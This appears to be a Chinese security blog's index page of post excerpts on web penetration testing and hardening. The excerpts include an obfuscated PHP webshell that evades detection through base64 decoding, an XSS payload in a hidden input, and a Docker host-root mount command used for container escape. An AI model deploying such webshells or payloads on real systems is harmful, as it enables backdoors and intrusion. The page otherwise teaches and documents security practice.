tech_lee

摘要： 经常在PHP语言中出现此类问题，但这并不意味着其他语言不存在。 常见的函数 PHP include(),include_once(),require_once(),fopen(),readfile().... jsp/servlet ava.io.file(),java.io.filereader( 阅读全文

摘要： 字典扫描 wwwscan 御剑 dirbuster等 目录爬行 awvs appscan burpsuite 开源程序 默认程序的默认管理后台 搜索引擎 利用快照收录获取网站相关信息 二级域名 有部分网站后台设置在二级域名上管理 端口站点 有部分网站后台设置在端口网站上管理 备份文件 扫描获取到网站 阅读全文

摘要： 其中包含几个关键的配置： magic_quotes_gpc 魔术引号，过滤转义四种字符，主要是针对SQL注入 safe_mod 安全模式，敏感函数被禁用，防御提权及后门调用 open_basedir 限制后门的访问目录 disable_function 可自定义禁用函数，安全模式的升级版。 阅读全文

摘要： 脚步执行权限保护 在IIS中，对应的敏感目录右键的“目录”标签下将”执行权限“选择为”无“，即可达到此目录下不再允许脚本执行。 拒绝目录及IP防护 在IIS中，对应的敏感目录右键的“目录安全性”标签下，可以设置IP地址访问限制。 多重密码验证防护 在IIS中，对应的敏感目录右键的“目录安全性”标签下 阅读全文

摘要： 函数替换 函数字符串拆分组合 自定义函数 回调函数 编码绕过 比如PHP <?php $a = base64_decode('YXNzZXh4'); $a = substr_replace($a,'rt',4); $a($_POST['x']); ?> 阅读全文

摘要： DOS命令 type 文件名.扩展名 查看文件内容 type 文件名.扩展名 ｜ more 分页查看 copy con 文件名 编辑结束用ctrl+z 编辑大量内容到文件 del 文件名 ——删除文件 del 文件名 /q ——删除文件 不需要提示 md 文件夹 —— 创建文件夹 attrib +h 阅读全文

摘要： 1、从本地传送文件到服务器 将 /home 目录中的 a.jsp 文件从本地传送到服务器 /home 目录下 scp /home/a.jsp root@xxx.xxx.xxx.xxx:/home 2、从服务器下载文件到本地 将服务器的 /home 目录中的a.jsp文件下载到本地的/home目录 s 阅读全文

摘要： <input type="hidden" name="returnurl" value="" accesskey="X" onclick="alert(document.domain)" /> 触发方法不同的浏览器不同，具体可参考https://www.w3school.com.cn/jsref/p 阅读全文

摘要： docker run -v /:/mnt -it alpine 阅读全文

摘要： apt-get install steghide steghide info xxx.jpg //分析图片内隐藏的信息 steghide extract -sf xxx.jpg //提取图片内隐藏的压缩包 阅读全文